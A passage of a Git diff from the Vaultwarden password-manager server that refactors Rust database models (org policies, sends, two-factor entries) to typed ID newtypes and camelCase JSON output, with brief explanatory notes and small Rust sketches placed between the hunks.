 mod organization;
 mod send;
 mod two_factor;
+mod two_factor_duo_context;
 mod two_factor_incomplete;
 mod user;

-pub use self::attachment::Attachment;
-pub use self::auth_request::AuthRequest;
-pub use self::cipher::Cipher;
-pub use self::collection::{Collection, CollectionCipher, CollectionUser};
-pub use self::device::{Device, DeviceType};
-pub use self::emergency_access::{EmergencyAccess, EmergencyAccessStatus, EmergencyAccessType};
+pub use self::attachment::{Attachment, AttachmentId};
+pub use self::auth_request::{AuthRequest, AuthRequestId};
+pub use self::cipher::{Cipher, CipherId, RepromptType};
+pub use self::collection::{Collection, CollectionCipher, CollectionId, CollectionUser};
+pub use self::device::{Device, DeviceId, DeviceType, PushId};
+pub use self::emergency_access::{EmergencyAccess, EmergencyAccessId, EmergencyAccessStatus, EmergencyAccessType};
 pub use self::event::{Event, EventType};
 pub use self::favorite::Favorite;
-pub use self::folder::{Folder, FolderCipher};
-pub use self::group::{CollectionGroup, Group, GroupUser};
-pub use self::org_policy::{OrgPolicy, OrgPolicyErr, OrgPolicyType};
-pub use self::organization::{Organization, OrganizationApiKey, UserOrgStatus, UserOrgType, UserOrganization};
-pub use self::send::{Send, SendType};
+pub use self::folder::{Folder, FolderCipher, FolderId};
+pub use self::group::{CollectionGroup, Group, GroupId, GroupUser};
+pub use self::org_policy::{OrgPolicy, OrgPolicyErr, OrgPolicyId, OrgPolicyType};
+pub use self::organization::{
+    Membership, MembershipId, MembershipStatus, MembershipType, OrgApiKeyId, Organization, OrganizationApiKey,
+    OrganizationId,
+};
+pub use self::send::{
+    id::{SendFileId, SendId},
+    Send, SendType,
+};
 pub use self::two_factor::{TwoFactor, TwoFactorType};
+pub use self::two_factor_duo_context::TwoFactorDuoContext;
 pub use self::two_factor_incomplete::TwoFactorIncomplete;
-pub use self::user::{Invitation, User, UserKdfType, UserStampException};
+pub use self::user::{Invitation, User, UserId, UserKdfType, UserStampException};
--- a/src/db/models/org_policy.rs
+++ b/src/db/models/org_policy.rs
@@ -1,27 +1,27 @@
+use derive_more::{AsRef, From};
 use serde::Deserialize;
 use serde_json::Value;

 use crate::api::EmptyResult;
 use crate::db::DbConn;
 use crate::error::MapResult;
-use crate::util::UpCase;

-use super::{TwoFactor, UserOrgStatus, UserOrgType, UserOrganization};
+use super::{Membership, MembershipId, MembershipStatus, MembershipType, OrganizationId, TwoFactor, UserId};

 db_object! {
     #[derive(Identifiable, Queryable, Insertable, AsChangeset)]
     #[diesel(table_name = org_policies)]
     #[diesel(primary_key(uuid))]
     pub struct OrgPolicy {
-        pub uuid: String,
-        pub org_uuid: String,
+        pub uuid: OrgPolicyId,
+        pub org_uuid: OrganizationId,
         pub atype: i32,
         pub enabled: bool,
         pub data: String,
     }
 }

-// https://github.com/bitwarden/server/blob/b86a04cef9f1e1b82cf18e49fc94e017c641130c/src/Core/Enums/PolicyType.cs
+// https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Enums/PolicyType.cs
 #[derive(Copy, Clone, Eq, PartialEq, num_derive::FromPrimitive)]
 pub enum OrgPolicyType {
     TwoFactorAuthentication = 0,
@@ -35,20 +35,26 @@ pub enum OrgPolicyType {
     ResetPassword = 8,
     // MaximumVaultTimeout = 9, // Not supported (Not AGPLv3 Licensed)
     // DisablePersonalVaultExport = 10, // Not supported (Not AGPLv3 Licensed)
+    // ActivateAutofill = 11,
+    // AutomaticAppLogIn = 12,
+    // FreeFamiliesSponsorshipPolicy = 13,
+    RemoveUnlockWithPin = 14,
 }

-// https://github.com/bitwarden/server/blob/5cbdee137921a19b1f722920f0fa3cd45af2ef0f/src/Core/Models/Data/Organizations/Policies/SendOptionsPolicyData.cs
+// https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Models/Data/Organizations/Policies/SendOptionsPolicyData.cs#L5
 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 pub struct SendOptionsPolicyData {
-    pub DisableHideEmail: bool,
+    #[serde(rename = "disableHideEmail", alias = "DisableHideEmail")]
+    pub disable_hide_email: bool,
 }

-// https://github.com/bitwarden/server/blob/5cbdee137921a19b1f722920f0fa3cd45af2ef0f/src/Core/Models/Data/Organizations/Policies/ResetPasswordDataModel.cs
+// https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Models/Data/Organizations/Policies/ResetPasswordDataModel.cs
 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 pub struct ResetPasswordDataModel {
-    pub AutoEnrollEnabled: bool,
+    #[serde(rename = "autoEnrollEnabled", alias = "AutoEnrollEnabled")]
+    pub auto_enroll_enabled: bool,
 }

 pub type OrgPolicyResult = Result<(), OrgPolicyErr>;
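The policy-data structs move from PascalCase Rust fields (previously silenced with `allow(non_snake_case)` and parsed through the old `UpCase` helper) to idiomatic snake_case plus serde attributes; the `alias` keeps legacy PascalCase payloads parsing during the transition. A runnable sketch of that rename-plus-alias trick (requires serde with the `derive` feature and serde_json):

```rust
// The field is snake_case in Rust, maps to camelCase on the wire, and still
// accepts the legacy PascalCase key on input via the alias.
use serde::Deserialize;

#[derive(Deserialize, Debug)]
struct SendOptionsPolicyData {
    #[serde(rename = "disableHideEmail", alias = "DisableHideEmail")]
    disable_hide_email: bool,
}

fn main() {
    // New camelCase payload.
    let new: SendOptionsPolicyData = serde_json::from_str(r#"{"disableHideEmail": true}"#).unwrap();
    // Old PascalCase payload, still accepted via the alias.
    let old: SendOptionsPolicyData = serde_json::from_str(r#"{"DisableHideEmail": true}"#).unwrap();
    assert_eq!(new.disable_hide_email, old.disable_hide_email);
    println!("both casings deserialize");
}
```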
@@ -61,9 +67,9 @@ pub enum OrgPolicyErr {
|
|||||||
|
|
||||||
/// Local methods
|
/// Local methods
|
||||||
impl OrgPolicy {
|
impl OrgPolicy {
|
||||||
pub fn new(org_uuid: String, atype: OrgPolicyType, data: String) -> Self {
|
pub fn new(org_uuid: OrganizationId, atype: OrgPolicyType, data: String) -> Self {
|
||||||
Self {
|
Self {
|
||||||
uuid: crate::util::get_uuid(),
|
uuid: OrgPolicyId(crate::util::get_uuid()),
|
||||||
org_uuid,
|
org_uuid,
|
||||||
atype: atype as i32,
|
atype: atype as i32,
|
||||||
enabled: false,
|
enabled: false,
|
||||||
@@ -77,14 +83,24 @@ impl OrgPolicy {
|
|||||||
|
|
||||||
pub fn to_json(&self) -> Value {
|
pub fn to_json(&self) -> Value {
|
||||||
let data_json: Value = serde_json::from_str(&self.data).unwrap_or(Value::Null);
|
let data_json: Value = serde_json::from_str(&self.data).unwrap_or(Value::Null);
|
||||||
json!({
|
let mut policy = json!({
|
||||||
"Id": self.uuid,
|
"id": self.uuid,
|
||||||
"OrganizationId": self.org_uuid,
|
"organizationId": self.org_uuid,
|
||||||
"Type": self.atype,
|
"type": self.atype,
|
||||||
"Data": data_json,
|
"data": data_json,
|
||||||
"Enabled": self.enabled,
|
"enabled": self.enabled,
|
||||||
"Object": "policy",
|
"object": "policy",
|
||||||
})
|
});
|
||||||
|
|
||||||
|
// Upstream adds this key/value
|
||||||
|
// Allow enabling Single Org policy when the organization has claimed domains.
|
||||||
|
// See: (https://github.com/bitwarden/server/pull/5565)
|
||||||
|
// We return the same to prevent possible issues
|
||||||
|
if self.atype == 8i32 {
|
||||||
|
policy["canToggleState"] = json!(true);
|
||||||
|
}
|
||||||
|
|
||||||
|
policy
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -114,7 +130,7 @@ impl OrgPolicy {
         // We need to make sure we're not going to violate the unique constraint on org_uuid and atype.
         // This happens automatically on other DBMS backends due to replace_into(). PostgreSQL does
         // not support multiple constraints on ON CONFLICT clauses.
-        diesel::delete(
+        let _: () = diesel::delete(
             org_policies::table
                 .filter(org_policies::org_uuid.eq(&self.org_uuid))
                 .filter(org_policies::atype.eq(&self.atype)),
@@ -141,17 +157,7 @@ impl OrgPolicy {
         }}
     }
 
-    pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
-        db_run! { conn: {
-            org_policies::table
-                .filter(org_policies::uuid.eq(uuid))
-                .first::<OrgPolicyDb>(conn)
-                .ok()
-                .from_db()
-        }}
-    }
-
-    pub async fn find_by_org(org_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_org(org_uuid: &OrganizationId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             org_policies::table
                 .filter(org_policies::org_uuid.eq(org_uuid))
@@ -161,7 +167,7 @@ impl OrgPolicy {
         }}
     }
 
-    pub async fn find_confirmed_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_confirmed_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             org_policies::table
                 .inner_join(
@@ -170,7 +176,7 @@ impl OrgPolicy {
                     .and(users_organizations::user_uuid.eq(user_uuid)))
                 )
                 .filter(
-                    users_organizations::status.eq(UserOrgStatus::Confirmed as i32)
+                    users_organizations::status.eq(MembershipStatus::Confirmed as i32)
                 )
                 .select(org_policies::all_columns)
                 .load::<OrgPolicyDb>(conn)
@@ -179,7 +185,11 @@ impl OrgPolicy {
         }}
     }
 
-    pub async fn find_by_org_and_type(org_uuid: &str, policy_type: OrgPolicyType, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_org_and_type(
+        org_uuid: &OrganizationId,
+        policy_type: OrgPolicyType,
+        conn: &mut DbConn,
+    ) -> Option<Self> {
         db_run! { conn: {
             org_policies::table
                 .filter(org_policies::org_uuid.eq(org_uuid))
@@ -190,7 +200,7 @@ impl OrgPolicy {
         }}
     }
 
-    pub async fn delete_all_by_organization(org_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_organization(org_uuid: &OrganizationId, conn: &mut DbConn) -> EmptyResult {
         db_run! { conn: {
             diesel::delete(org_policies::table.filter(org_policies::org_uuid.eq(org_uuid)))
                 .execute(conn)
@@ -199,9 +209,9 @@ impl OrgPolicy {
     }
 
     pub async fn find_accepted_and_confirmed_by_user_and_active_policy(
-        user_uuid: &str,
+        user_uuid: &UserId,
         policy_type: OrgPolicyType,
         conn: &mut DbConn,
     ) -> Vec<Self> {
         db_run! { conn: {
             org_policies::table
@@ -211,10 +221,10 @@ impl OrgPolicy {
                     .and(users_organizations::user_uuid.eq(user_uuid)))
                 )
                 .filter(
-                    users_organizations::status.eq(UserOrgStatus::Accepted as i32)
+                    users_organizations::status.eq(MembershipStatus::Accepted as i32)
                 )
                 .or_filter(
-                    users_organizations::status.eq(UserOrgStatus::Confirmed as i32)
+                    users_organizations::status.eq(MembershipStatus::Confirmed as i32)
                 )
                 .filter(org_policies::atype.eq(policy_type as i32))
                 .filter(org_policies::enabled.eq(true))
@@ -226,7 +236,7 @@ impl OrgPolicy {
     }
 
     pub async fn find_confirmed_by_user_and_active_policy(
-        user_uuid: &str,
+        user_uuid: &UserId,
         policy_type: OrgPolicyType,
         conn: &mut DbConn,
     ) -> Vec<Self> {
@@ -238,7 +248,7 @@ impl OrgPolicy {
                     .and(users_organizations::user_uuid.eq(user_uuid)))
                 )
                 .filter(
-                    users_organizations::status.eq(UserOrgStatus::Confirmed as i32)
+                    users_organizations::status.eq(MembershipStatus::Confirmed as i32)
                 )
                 .filter(org_policies::atype.eq(policy_type as i32))
                 .filter(org_policies::enabled.eq(true))
@@ -253,21 +263,21 @@ impl OrgPolicy {
     /// and the user is not an owner or admin of that org. This is only useful for checking
     /// applicability of policy types that have these particular semantics.
     pub async fn is_applicable_to_user(
-        user_uuid: &str,
+        user_uuid: &UserId,
         policy_type: OrgPolicyType,
-        exclude_org_uuid: Option<&str>,
+        exclude_org_uuid: Option<&OrganizationId>,
         conn: &mut DbConn,
     ) -> bool {
         for policy in
             OrgPolicy::find_accepted_and_confirmed_by_user_and_active_policy(user_uuid, policy_type, conn).await
         {
             // Check if we need to skip this organization.
-            if exclude_org_uuid.is_some() && exclude_org_uuid.unwrap() == policy.org_uuid {
+            if exclude_org_uuid.is_some() && *exclude_org_uuid.unwrap() == policy.org_uuid {
                 continue;
             }
 
-            if let Some(user) = UserOrganization::find_by_user_and_org(user_uuid, &policy.org_uuid, conn).await {
-                if user.atype < UserOrgType::Admin {
+            if let Some(user) = Membership::find_by_user_and_org(user_uuid, &policy.org_uuid, conn).await {
+                if user.atype < MembershipType::Admin {
                     return true;
                 }
             }
@@ -276,8 +286,8 @@ impl OrgPolicy {
     }
 
     pub async fn is_user_allowed(
-        user_uuid: &str,
-        org_uuid: &str,
+        user_uuid: &UserId,
+        org_uuid: &OrganizationId,
         exclude_current_org: bool,
         conn: &mut DbConn,
     ) -> OrgPolicyResult {
@@ -305,11 +315,11 @@ impl OrgPolicy {
         Ok(())
     }
 
-    pub async fn org_is_reset_password_auto_enroll(org_uuid: &str, conn: &mut DbConn) -> bool {
+    pub async fn org_is_reset_password_auto_enroll(org_uuid: &OrganizationId, conn: &mut DbConn) -> bool {
         match OrgPolicy::find_by_org_and_type(org_uuid, OrgPolicyType::ResetPassword, conn).await {
-            Some(policy) => match serde_json::from_str::<UpCase<ResetPasswordDataModel>>(&policy.data) {
+            Some(policy) => match serde_json::from_str::<ResetPasswordDataModel>(&policy.data) {
                 Ok(opts) => {
-                    return policy.enabled && opts.data.AutoEnrollEnabled;
+                    return policy.enabled && opts.auto_enroll_enabled;
                 }
                 _ => error!("Failed to deserialize ResetPasswordDataModel: {}", policy.data),
             },
@@ -321,15 +331,15 @@ impl OrgPolicy {
 
     /// Returns true if the user belongs to an org that has enabled the `DisableHideEmail`
     /// option of the `Send Options` policy, and the user is not an owner or admin of that org.
-    pub async fn is_hide_email_disabled(user_uuid: &str, conn: &mut DbConn) -> bool {
+    pub async fn is_hide_email_disabled(user_uuid: &UserId, conn: &mut DbConn) -> bool {
         for policy in
             OrgPolicy::find_confirmed_by_user_and_active_policy(user_uuid, OrgPolicyType::SendOptions, conn).await
         {
-            if let Some(user) = UserOrganization::find_by_user_and_org(user_uuid, &policy.org_uuid, conn).await {
-                if user.atype < UserOrgType::Admin {
-                    match serde_json::from_str::<UpCase<SendOptionsPolicyData>>(&policy.data) {
+            if let Some(user) = Membership::find_by_user_and_org(user_uuid, &policy.org_uuid, conn).await {
+                if user.atype < MembershipType::Admin {
+                    match serde_json::from_str::<SendOptionsPolicyData>(&policy.data) {
                         Ok(opts) => {
-                            if opts.data.DisableHideEmail {
+                            if opts.disable_hide_email {
                                 return true;
                             }
                         }
@@ -340,4 +350,20 @@ impl OrgPolicy {
         }
         false
     }
+
+    pub async fn is_enabled_for_member(
+        member_uuid: &MembershipId,
+        policy_type: OrgPolicyType,
+        conn: &mut DbConn,
+    ) -> bool {
+        if let Some(member) = Membership::find_by_uuid(member_uuid, conn).await {
+            if let Some(policy) = OrgPolicy::find_by_org_and_type(&member.org_uuid, policy_type, conn).await {
+                return policy.enabled;
+            }
+        }
+        false
+    }
 }
+
+#[derive(Clone, Debug, AsRef, DieselNewType, From, FromForm, PartialEq, Eq, Hash, Serialize, Deserialize)]
+pub struct OrgPolicyId(String);
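OrgPolicyId, OrganizationId, UserId and the other new wrappers are all the same typed-id pattern: the database still stores plain strings, but the Rust signatures can no longer mix one kind of id with another. A cut-down sketch (plain derives only, none of the Diesel/Rocket machinery) of what the newtypes buy:

// Both ids are strings at rest; distinct wrapper types turn a swapped
// argument into a compile error instead of a query against the wrong column.
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
struct OrganizationId(String);

#[derive(Clone, Debug, PartialEq, Eq, Hash)]
struct UserId(String);

fn find_by_org(org_uuid: &OrganizationId) -> String {
    format!("SELECT * FROM org_policies WHERE org_uuid = '{}'", org_uuid.0)
}

fn main() {
    let org = OrganizationId("org-5a3f".into());
    let user = UserId("user-9c81".into());
    println!("{}", find_by_org(&org));
    // find_by_org(&user); // error[E0308]: mismatched types
    let _ = user;
}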
(File diff suppressed because it is too large)
src/db/models/send.rs:
@@ -1,7 +1,10 @@
 use chrono::{NaiveDateTime, Utc};
 use serde_json::Value;
 
-use super::User;
+use crate::{config::PathType, util::LowerCase, CONFIG};
 
+use super::{OrganizationId, User, UserId};
+use id::SendId;
+
 db_object! {
     #[derive(Identifiable, Queryable, Insertable, AsChangeset)]
@@ -9,11 +12,10 @@ db_object! {
     #[diesel(treat_none_as_null = true)]
     #[diesel(primary_key(uuid))]
     pub struct Send {
-        pub uuid: String,
-
-        pub user_uuid: Option<String>,
-        pub organization_uuid: Option<String>,
+        pub uuid: SendId,
+
+        pub user_uuid: Option<UserId>,
+        pub organization_uuid: Option<OrganizationId>,
 
         pub name: String,
         pub notes: Option<String>,
@@ -49,7 +51,7 @@ impl Send {
         let now = Utc::now().naive_utc();
 
         Self {
-            uuid: crate::util::get_uuid(),
+            uuid: SendId::from(crate::util::get_uuid()),
             user_uuid: None,
             organization_uuid: None,
 
@@ -122,48 +124,58 @@ impl Send {
         use data_encoding::BASE64URL_NOPAD;
         use uuid::Uuid;
 
-        let data: Value = serde_json::from_str(&self.data).unwrap_or_default();
+        let mut data = serde_json::from_str::<LowerCase<Value>>(&self.data).map(|d| d.data).unwrap_or_default();
+
+        // Mobile clients expect size to be a string instead of a number
+        if let Some(size) = data.get("size").and_then(|v| v.as_i64()) {
+            data["size"] = Value::String(size.to_string());
+        }
 
         json!({
-            "Id": self.uuid,
-            "AccessId": BASE64URL_NOPAD.encode(Uuid::parse_str(&self.uuid).unwrap_or_default().as_bytes()),
-            "Type": self.atype,
+            "id": self.uuid,
+            "accessId": BASE64URL_NOPAD.encode(Uuid::parse_str(&self.uuid).unwrap_or_default().as_bytes()),
+            "type": self.atype,
 
-            "Name": self.name,
-            "Notes": self.notes,
-            "Text": if self.atype == SendType::Text as i32 { Some(&data) } else { None },
-            "File": if self.atype == SendType::File as i32 { Some(&data) } else { None },
+            "name": self.name,
+            "notes": self.notes,
+            "text": if self.atype == SendType::Text as i32 { Some(&data) } else { None },
+            "file": if self.atype == SendType::File as i32 { Some(&data) } else { None },
 
-            "Key": self.akey,
-            "MaxAccessCount": self.max_access_count,
-            "AccessCount": self.access_count,
-            "Password": self.password_hash.as_deref().map(|h| BASE64URL_NOPAD.encode(h)),
-            "Disabled": self.disabled,
-            "HideEmail": self.hide_email,
+            "key": self.akey,
+            "maxAccessCount": self.max_access_count,
+            "accessCount": self.access_count,
+            "password": self.password_hash.as_deref().map(|h| BASE64URL_NOPAD.encode(h)),
+            "disabled": self.disabled,
+            "hideEmail": self.hide_email,
 
-            "RevisionDate": format_date(&self.revision_date),
-            "ExpirationDate": self.expiration_date.as_ref().map(format_date),
-            "DeletionDate": format_date(&self.deletion_date),
-            "Object": "send",
+            "revisionDate": format_date(&self.revision_date),
+            "expirationDate": self.expiration_date.as_ref().map(format_date),
+            "deletionDate": format_date(&self.deletion_date),
+            "object": "send",
         })
     }
 
     pub async fn to_json_access(&self, conn: &mut DbConn) -> Value {
         use crate::util::format_date;
 
-        let data: Value = serde_json::from_str(&self.data).unwrap_or_default();
+        let mut data = serde_json::from_str::<LowerCase<Value>>(&self.data).map(|d| d.data).unwrap_or_default();
+
+        // Mobile clients expect size to be a string instead of a number
+        if let Some(size) = data.get("size").and_then(|v| v.as_i64()) {
+            data["size"] = Value::String(size.to_string());
+        }
 
         json!({
-            "Id": self.uuid,
-            "Type": self.atype,
+            "id": self.uuid,
+            "type": self.atype,
 
-            "Name": self.name,
-            "Text": if self.atype == SendType::Text as i32 { Some(&data) } else { None },
-            "File": if self.atype == SendType::File as i32 { Some(&data) } else { None },
+            "name": self.name,
+            "text": if self.atype == SendType::Text as i32 { Some(&data) } else { None },
+            "file": if self.atype == SendType::File as i32 { Some(&data) } else { None },
 
-            "ExpirationDate": self.expiration_date.as_ref().map(format_date),
-            "CreatorIdentifier": self.creator_identifier(conn).await,
-            "Object": "send-access",
+            "expirationDate": self.expiration_date.as_ref().map(format_date),
+            "creatorIdentifier": self.creator_identifier(conn).await,
+            "object": "send-access",
        })
     }
 }
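Both to_json variants now normalize the stored send data the same way, including the size-as-string fix-up for mobile clients. In isolation the rewrite looks like this (serde_json only; LowerCase is vaultwarden's own helper and is left out here):

use serde_json::{json, Value};

fn main() {
    let mut data: Value = json!({ "fileName": "report.pdf", "size": 1_048_576 });
    // Rewrite the numeric size as a string in place, mirroring the diff.
    if let Some(size) = data.get("size").and_then(|v| v.as_i64()) {
        data["size"] = Value::String(size.to_string());
    }
    assert_eq!(data["size"], json!("1048576"));
}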
@@ -214,7 +226,8 @@ impl Send {
         self.update_users_revision(conn).await;
 
         if self.atype == SendType::File as i32 {
-            std::fs::remove_dir_all(std::path::Path::new(&crate::CONFIG.sends_folder()).join(&self.uuid)).ok();
+            let operator = CONFIG.opendal_operator_for_path_type(PathType::Sends)?;
+            operator.remove_all(&self.uuid).await.ok();
         }
 
         db_run! { conn: {
@@ -231,7 +244,7 @@ impl Send {
         }
     }
 
-    pub async fn update_users_revision(&self, conn: &mut DbConn) -> Vec<String> {
+    pub async fn update_users_revision(&self, conn: &mut DbConn) -> Vec<UserId> {
         let mut user_uuids = Vec::new();
         match &self.user_uuid {
             Some(user_uuid) => {
@@ -245,7 +258,7 @@ impl Send {
         user_uuids
     }
 
-    pub async fn delete_all_by_user(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_user(user_uuid: &UserId, conn: &mut DbConn) -> EmptyResult {
         for send in Self::find_by_user(user_uuid, conn).await {
             send.delete(conn).await?;
         }
@@ -256,20 +269,19 @@ impl Send {
         use data_encoding::BASE64URL_NOPAD;
         use uuid::Uuid;
 
-        let uuid_vec = match BASE64URL_NOPAD.decode(access_id.as_bytes()) {
-            Ok(v) => v,
-            Err(_) => return None,
+        let Ok(uuid_vec) = BASE64URL_NOPAD.decode(access_id.as_bytes()) else {
+            return None;
         };
 
         let uuid = match Uuid::from_slice(&uuid_vec) {
-            Ok(u) => u.to_string(),
+            Ok(u) => SendId::from(u.to_string()),
             Err(_) => return None,
         };
 
         Self::find_by_uuid(&uuid, conn).await
     }
 
-    pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_uuid(uuid: &SendId, conn: &mut DbConn) -> Option<Self> {
         db_run! {conn: {
             sends::table
                 .filter(sends::uuid.eq(uuid))
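The from_access_id path above pairs with the accessId emitted by to_json: a send's UUID bytes, base64url-encoded without padding. A round-trip sketch (assuming the data-encoding crate and uuid with the v4 feature), also showing the let-else shape that replaced the old match-with-Err-arm:

use data_encoding::BASE64URL_NOPAD;
use uuid::Uuid;

fn decode_access_id(access_id: &str) -> Option<Uuid> {
    // let-else bails out early on malformed input.
    let Ok(bytes) = BASE64URL_NOPAD.decode(access_id.as_bytes()) else {
        return None;
    };
    Uuid::from_slice(&bytes).ok()
}

fn main() {
    let uuid = Uuid::new_v4();
    let access_id = BASE64URL_NOPAD.encode(uuid.as_bytes());
    assert_eq!(decode_access_id(&access_id), Some(uuid));
    assert_eq!(decode_access_id("not/base64!"), None);
}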
@@ -279,7 +291,18 @@ impl Send {
         }}
     }
 
-    pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_uuid_and_user(uuid: &SendId, user_uuid: &UserId, conn: &mut DbConn) -> Option<Self> {
+        db_run! {conn: {
+            sends::table
+                .filter(sends::uuid.eq(uuid))
+                .filter(sends::user_uuid.eq(user_uuid))
+                .first::<SendDb>(conn)
+                .ok()
+                .from_db()
+        }}
+    }
+
+    pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
         db_run! {conn: {
             sends::table
                 .filter(sends::user_uuid.eq(user_uuid))
@@ -287,28 +310,21 @@ impl Send {
         }}
     }
 
-    pub async fn size_by_user(user_uuid: &str, conn: &mut DbConn) -> Option<i64> {
+    pub async fn size_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Option<i64> {
         let sends = Self::find_by_user(user_uuid, conn).await;
 
-        #[allow(non_snake_case)]
-        #[derive(serde::Deserialize, Default)]
+        #[derive(serde::Deserialize)]
         struct FileData {
-            Size: Option<NumberOrString>,
-            size: Option<NumberOrString>,
+            #[serde(rename = "size", alias = "Size")]
+            size: NumberOrString,
         }
 
         let mut total: i64 = 0;
         for send in sends {
             if send.atype == SendType::File as i32 {
-                let data: FileData = serde_json::from_str(&send.data).unwrap_or_default();
-
-                let size = match (data.size, data.Size) {
-                    (Some(s), _) => s.into_i64(),
-                    (_, Some(s)) => s.into_i64(),
-                    (None, None) => continue,
-                };
-
-                if let Ok(size) = size {
+                if let Ok(size) =
+                    serde_json::from_str::<FileData>(&send.data).map_err(Into::into).and_then(|d| d.size.into_i64())
+                {
                     total = total.checked_add(size)?;
                 };
             }
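size_by_user keeps the quota total overflow-safe: checked_add returns None instead of wrapping, and `?` turns that into the function's own Option result. Reduced to its core:

fn total_size(sizes: &[i64]) -> Option<i64> {
    let mut total: i64 = 0;
    for size in sizes {
        // checked_add yields None on i64 overflow, so a corrupt or
        // adversarial size cannot silently wrap the running total.
        total = total.checked_add(*size)?;
    }
    Some(total)
}

fn main() {
    assert_eq!(total_size(&[10, 20, 30]), Some(60));
    assert_eq!(total_size(&[i64::MAX, 1]), None);
}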
@@ -317,7 +333,7 @@ impl Send {
         Some(total)
     }
 
-    pub async fn find_by_org(org_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_org(org_uuid: &OrganizationId, conn: &mut DbConn) -> Vec<Self> {
         db_run! {conn: {
             sends::table
                 .filter(sends::organization_uuid.eq(org_uuid))
@@ -334,3 +350,48 @@ impl Send {
         }}
     }
 }
+
+// separate namespace to avoid name collision with std::marker::Send
+pub mod id {
+    use derive_more::{AsRef, Deref, Display, From};
+    use macros::{IdFromParam, UuidFromParam};
+    use std::marker::Send;
+    use std::path::Path;
+
+    #[derive(
+        Clone,
+        Debug,
+        AsRef,
+        Deref,
+        DieselNewType,
+        Display,
+        From,
+        FromForm,
+        Hash,
+        PartialEq,
+        Eq,
+        Serialize,
+        Deserialize,
+        UuidFromParam,
+    )]
+    pub struct SendId(String);
+
+    impl AsRef<Path> for SendId {
+        #[inline]
+        fn as_ref(&self) -> &Path {
+            Path::new(&self.0)
+        }
+    }
+
+    #[derive(
+        Clone, Debug, AsRef, Deref, Display, From, FromForm, Hash, PartialEq, Eq, Serialize, Deserialize, IdFromParam,
+    )]
+    pub struct SendFileId(String);
+
+    impl AsRef<Path> for SendFileId {
+        #[inline]
+        fn as_ref(&self) -> &Path {
+            Path::new(&self.0)
+        }
+    }
+}
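Because the model struct is itself named Send, a bare `SendId` item at file scope would sit next to code that also needs the std::marker::Send auto trait, so the id types live in their own pub mod id. A toy version (std only, a pub field instead of the derive stack) showing the AsRef<Path> hook that lets the id be passed straight to Path::join when locating a send's storage directory:

mod id {
    use std::path::Path;

    pub struct SendId(pub String);

    // AsRef<Path> means the id can be used anywhere a path segment is
    // expected, e.g. Path::join below.
    impl AsRef<Path> for SendId {
        fn as_ref(&self) -> &Path {
            Path::new(&self.0)
        }
    }
}

fn main() {
    let send_id = id::SendId("6c0b07ea-419e-4edb-8a9a-17a21c888d74".into());
    let dir = std::path::Path::new("data/sends").join(&send_id);
    println!("{}", dir.display());
}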
src/db/models/two_factor.rs:
@@ -1,5 +1,6 @@
 use serde_json::Value;
 
+use super::UserId;
 use crate::{api::EmptyResult, db::DbConn, error::MapResult};
 
 db_object! {
@@ -7,12 +8,12 @@ db_object! {
     #[diesel(table_name = twofactor)]
     #[diesel(primary_key(uuid))]
     pub struct TwoFactor {
-        pub uuid: String,
-        pub user_uuid: String,
+        pub uuid: TwoFactorId,
+        pub user_uuid: UserId,
         pub atype: i32,
         pub enabled: bool,
         pub data: String,
-        pub last_used: i32,
+        pub last_used: i64,
     }
 }
 
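Widening last_used from i32 to i64 looks like the usual timestamp-headroom move: a signed 32-bit unix-style counter runs out on 2038-01-19 (this rationale is an inference; the diff itself does not state the reason). A two-assertion demonstration:

fn main() {
    // 2^31 seconds past the epoch is 03:14:08 UTC on 2038-01-19,
    // one past i32::MAX, so it no longer fits in an i32 column.
    let jan_2038: i64 = 2_147_483_648;
    assert!(i32::try_from(jan_2038).is_err());
    println!("{jan_2038} does not fit in an i32 timestamp field");
}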
@@ -41,9 +42,9 @@ pub enum TwoFactorType {
 
 /// Local methods
 impl TwoFactor {
-    pub fn new(user_uuid: String, atype: TwoFactorType, data: String) -> Self {
+    pub fn new(user_uuid: UserId, atype: TwoFactorType, data: String) -> Self {
         Self {
-            uuid: crate::util::get_uuid(),
+            uuid: TwoFactorId(crate::util::get_uuid()),
             user_uuid,
             atype: atype as i32,
             enabled: true,
@@ -54,17 +55,17 @@ impl TwoFactor {
 
     pub fn to_json(&self) -> Value {
         json!({
-            "Enabled": self.enabled,
-            "Key": "", // This key and value vary
-            "Object": "twoFactorAuthenticator" // This value varies
+            "enabled": self.enabled,
+            "key": "", // This key and value vary
+            "object": "twoFactorAuthenticator" // This value varies
         })
     }
 
     pub fn to_json_provider(&self) -> Value {
         json!({
-            "Enabled": self.enabled,
-            "Type": self.atype,
-            "Object": "twoFactorProvider"
+            "enabled": self.enabled,
+            "type": self.atype,
+            "object": "twoFactorProvider"
         })
     }
 }
@@ -95,7 +96,7 @@ impl TwoFactor {
         // We need to make sure we're not going to violate the unique constraint on user_uuid and atype.
         // This happens automatically on other DBMS backends due to replace_into(). PostgreSQL does
         // not support multiple constraints on ON CONFLICT clauses.
-        diesel::delete(twofactor::table.filter(twofactor::user_uuid.eq(&self.user_uuid)).filter(twofactor::atype.eq(&self.atype)))
